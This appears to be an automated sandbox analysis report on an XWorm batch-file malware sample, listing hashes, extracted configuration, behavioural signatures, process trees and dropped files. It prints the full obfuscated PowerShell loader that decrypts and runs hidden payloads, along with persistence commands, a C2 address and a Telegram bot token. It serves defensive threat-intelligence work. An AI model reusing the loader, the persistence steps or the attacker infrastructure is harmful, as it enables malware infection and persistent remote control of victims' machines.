Analysis
Max time kernel: 140s
Max time network: 141s
Platform: windows10-2004_x64
Resource: win10v2004-20240508-en
Resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
Submitted: 22-05-2024 18:07

Static task: static1
Behavioral task: behavioral1
  Sample: XClient.bat
  Resource: win7-20240215-en
Behavioral task: behavioral2
  Sample: XClient.bat
  Resource: win10v2004-20240508-en

General
Target: XClient.bat
Size: 64KB
MD5: b9ba38c08e5f9113c31434ae324b3a67
SHA1: c5a03303b400dcac370989ba8e51e0b0a3c0622d
SHA256: b32ef974fa3195e1e88e290cb4b98f156e8ec3a5a053a8c781ecc2a8e47bf408
SHA512: a6960a62f1034441acce040366313c4e70563c4b57c8ca2fa30161e06f6489a86de7af52d3f5c5f69e806a8c0097ed7367e136070f40443cfe73945cb86d099c
SSDEEP: 768:AO70rJOxpoeQhjCEqvimrMRLdJmmC5UXfs3NadfzteQCv/vFyVzgZpB+20JaaaTg:3CgSGNIfso7tqvFysTTdpePNKaAURYja

Malware Config
Extracted
Family: xworm
Version: 5.0
C2: 83.143.112.35:7000
Mutex: CyKBTjaY0aAqNzKT
Install_directory: %Temp%
install_file: Chrome.exe
telegram: https://api.telegram.org/bot6671364658:AAFSR01MD7rod9u5ExKsea5-2_kUtJR70Ks

Signatures

Detect Xworm Payload (1 IoC)
  resource                                                                        | yara_rule
  behavioral2/memory/1120-47-0x0000021F6D970000-0x0000021F6D980000-memory.dmp     | family_xworm

Blocklisted process makes network request (2 IoCs)
  Processes: powershell.exe
  flow | pid  | process
  15   | 1120 | powershell.exe
  26   | 1120 | powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Run Powershell and hide display window.

Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Processes: WScript.exe
  description       | ioc                                                                                                  | process
  Key value queried | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation | WScript.exe

Drops startup file (2 IoCs)
  Processes: powershell.exe
  description                  | ioc                                                                                     | process
  File created                 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome.lnk | powershell.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome.lnk | powershell.exe

Executes dropped EXE (1 IoC)
  Processes: Chrome.exe
  pid  | process
  2216 | Chrome.exe

Adds Run key to start application (2 TTPs, 1 IoC)
  Processes: powershell.exe
  description     | ioc                                                                                                                                                                        | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Chrome = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Chrome.exe" | powershell.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.

Modifies registry class (1 IoC)
  Processes: powershell.exe
  description | ioc                                                                                  | process
  Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings | powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses (9 IoCs)
  Processes: powershell.exe, powershell.exe, powershell.exe, Chrome.exe
  pid  | process
  3688 | powershell.exe
  3688 | powershell.exe
  3132 | powershell.exe
  3132 | powershell.exe
  1120 | powershell.exe
  1120 | powershell.exe
  1120 | powershell.exe
  2216 | Chrome.exe
  2216 | Chrome.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes: powershell.exe, powershell.exe
  description (Token)      | pid  | process
  SeDebugPrivilege         | 3688 | powershell.exe
  SeDebugPrivilege         | 3132 | powershell.exe
  The remaining 62 entries are all for pid 3132 (powershell.exe) and consist of the following run of 21 tokens recorded three times in sequence, the third run ending at token 35:
  SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36

Suspicious use of SetWindowsHookEx (1 IoC)
  Processes: powershell.exe
  pid  | process
  1120 | powershell.exe

Suspicious use of WriteProcessMemory (24 IoCs)
  Processes: cmd.exe, net.exe, powershell.exe, WScript.exe, cmd.exe, net.exe, powershell.exe
  Each of the 12 writes below is recorded twice in the report (24 entries in all).
  description                      | pid  | process        | target process
  PID 2240 wrote to memory of 2368 | 2240 | cmd.exe        | net.exe
  PID 2368 wrote to memory of 688  | 2368 | net.exe        | net1.exe
  PID 2240 wrote to memory of 396  | 2240 | cmd.exe        | cmd.exe
  PID 2240 wrote to memory of 3688 | 2240 | cmd.exe        | powershell.exe
  PID 3688 wrote to memory of 3132 | 3688 | powershell.exe | powershell.exe
  PID 3688 wrote to memory of 4776 | 3688 | powershell.exe | WScript.exe
  PID 4776 wrote to memory of 2780 | 4776 | WScript.exe    | cmd.exe
  PID 2780 wrote to memory of 3220 | 2780 | cmd.exe        | net.exe
  PID 3220 wrote to memory of 452  | 3220 | net.exe        | net1.exe
  PID 2780 wrote to memory of 3252 | 2780 | cmd.exe        | cmd.exe
  PID 2780 wrote to memory of 1120 | 2780 | cmd.exe        | powershell.exe
  PID 1120 wrote to memory of 1604 | 1120 | powershell.exe | schtasks.exe

Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes
(indentation follows the depth number the report gives each process; the behaviours flagged for a process are listed beneath its command line)

[1] C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\system32\net.exe
      Command line: net file
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 file

  [2] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BtOk9w8o5AaasA3bULFmu6lzZU3YsXiJgOkhZu5Ls94='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5VSAd5R0G23+J6h8QdUPsw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $JoEHY=New-Object System.IO.MemoryStream(,$param_var); $xGFrj=New-Object System.IO.MemoryStream; $jBGtG=New-Object System.IO.Compression.GZipStream($JoEHY, [IO.Compression.CompressionMode]::Decompress); $jBGtG.CopyTo($xGFrj); $jBGtG.Dispose(); $JoEHY.Dispose(); $xGFrj.Dispose(); $xGFrj.ToArray();}function execute_function($param_var,$param2_var){ $nZTyZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $cFMlz=$nZTyZ.EntryPoint; $cFMlz.Invoke($null, $param2_var);}$DYtQC = 'C:\Users\Admin\AppData\Local\Temp\XClient.bat';$host.UI.RawUI.WindowTitle = $DYtQC;$vVoJL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DYtQC).Split([Environment]::NewLine);foreach ($wnWAJ in $vVoJL) { if ($wnWAJ.StartsWith('rLSCSMNubfwqFDjMCNvM')) { $KKhqP=$wnWAJ.Substring(20); break; }}$payloads_var=[string[]]$KKhqP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_36_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_36.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\WScript.exe
        Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_36.vbs"
        - Checks computer location settings
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_36.bat" "
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\system32\net.exe
            Command line: net file
            - Suspicious use of WriteProcessMemory

          [6] C:\Windows\system32\net1.exe
              Command line: C:\Windows\system32\net1 file

        [5] C:\Windows\system32\cmd.exe
            Command line: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BtOk9w8o5AaasA3bULFmu6lzZU3YsXiJgOkhZu5Ls94='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5VSAd5R0G23+J6h8QdUPsw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $JoEHY=New-Object System.IO.MemoryStream(,$param_var); $xGFrj=New-Object System.IO.MemoryStream; $jBGtG=New-Object System.IO.Compression.GZipStream($JoEHY, [IO.Compression.CompressionMode]::Decompress); $jBGtG.CopyTo($xGFrj); $jBGtG.Dispose(); $JoEHY.Dispose(); $xGFrj.Dispose(); $xGFrj.ToArray();}function execute_function($param_var,$param2_var){ $nZTyZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $cFMlz=$nZTyZ.EntryPoint; $cFMlz.Invoke($null, $param2_var);}$DYtQC = 'C:\Users\Admin\AppData\Roaming\Windows_Log_36.bat';$host.UI.RawUI.WindowTitle = $DYtQC;$vVoJL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DYtQC).Split([Environment]::NewLine);foreach ($wnWAJ in $vVoJL) { if ($wnWAJ.StartsWith('rLSCSMNubfwqFDjMCNvM')) { $KKhqP=$wnWAJ.Substring(20); break; }}$payloads_var=[string[]]$KKhqP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
            - Blocklisted process makes network request
            - Drops startup file
            - Adds Run key to start application
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of SetWindowsHookEx
            - Suspicious use of WriteProcessMemory

          [6] C:\Windows\System32\schtasks.exe
              Command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome" /tr "C:\Users\Admin\AppData\Local\Temp\Chrome.exe"
              - Creates scheduled task(s)

[1] C:\Users\Admin\AppData\Local\Temp\Chrome.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\Chrome.exe
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses

Network
MITRE ATT&CK Matrix (ATT&CK v13)
Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: 8f3393c68c469e2d1c92f7ee490b8489
  SHA1: 68013254b5a1d3f39d0ce88c7b7482fe7b8b9855
  SHA256: 3a3ac14eac25092a16f327609ab86ae52028565b1639c76f571aee5822488c23
  SHA512: f71421b47408354c7b9f1ed5e6129aad398e6ecd6115ee044edea75976e015d83283ed3bbdbb3edafeac9caddfa53b551a734eb4a303014c4f95e8bdce1e67d4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
  Filesize: 53KB
  MD5: a26df49623eff12a70a93f649776dab7
  SHA1: efb53bd0df3ac34bd119adf8788127ad57e53803
  SHA256: 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
  SHA512: e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
  Filesize: 2KB
  MD5: 005bc2ef5a9d890fb2297be6a36f01c2
  SHA1: 0c52adee1316c54b0bfdc510c0963196e7ebb430
  SHA256: 342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
  SHA512: f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

C:\Users\Admin\AppData\Local\Temp\Chrome.exe
  Filesize: 442KB
  MD5: 04029e121a0cfa5991749937dd22a1d9
  SHA1: f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
  SHA256: 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
  SHA512: 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1lcuiiya.zuy.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Roaming\Windows_Log_36.bat
  Filesize: 64KB
  MD5: b9ba38c08e5f9113c31434ae324b3a67
  SHA1: c5a03303b400dcac370989ba8e51e0b0a3c0622d
  SHA256: b32ef974fa3195e1e88e290cb4b98f156e8ec3a5a053a8c781ecc2a8e47bf408
  SHA512: a6960a62f1034441acce040366313c4e70563c4b57c8ca2fa30161e06f6489a86de7af52d3f5c5f69e806a8c0097ed7367e136070f40443cfe73945cb86d099c
  (size and all four hashes are identical to the submitted sample XClient.bat, so this is a copy of the original batch file written to the Roaming profile)

C:\Users\Admin\AppData\Roaming\Windows_Log_36.vbs
  Filesize: 114B
  MD5: b41c44ccbb13db613bb95dd9a6ea3954
  SHA1: 32c826b5c1f85311494dba838f697bf50cd1943a
  SHA256: 3419157a7f5541e31088ce4ff48c99c3c3c4d5ffed251650ff9a723ad5ccfa9c
  SHA512: 9df865730a6e015e59b45750ee6ada5ae0c0636bb7d706c4bd23e56434a59553d1388a67fcbe3326668be08ba14e73f8abe6cd952c521ec3651f280ca8c36ba9

Memory dumps
  memory/1120-47-0x0000021F6D970000-0x0000021F6D980000-memory.dmp    Filesize: 64KB
  memory/3688-12-0x00007FF8F5670000-0x00007FF8F6131000-memory.dmp    Filesize: 10.8MB
  memory/3688-16-0x000001E4F2090000-0x000001E4F209E000-memory.dmp    Filesize: 56KB
  memory/3688-15-0x000001E4F1CE0000-0x000001E4F1CE8000-memory.dmp    Filesize: 32KB
  memory/3688-14-0x000001E4F4630000-0x000001E4F46A6000-memory.dmp    Filesize: 472KB
  memory/3688-13-0x000001E4F45E0000-0x000001E4F4624000-memory.dmp    Filesize: 272KB
  memory/3688-46-0x00007FF8F5670000-0x00007FF8F6131000-memory.dmp    Filesize: 10.8MB
  memory/3688-0-0x00007FF8F5673000-0x00007FF8F5675000-memory.dmp     Filesize: 8KB
  memory/3688-11-0x00007FF8F5670000-0x00007FF8F6131000-memory.dmp    Filesize: 10.8MB
  memory/3688-10-0x000001E4F2040000-0x000001E4F2062000-memory.dmp    Filesize: 136KB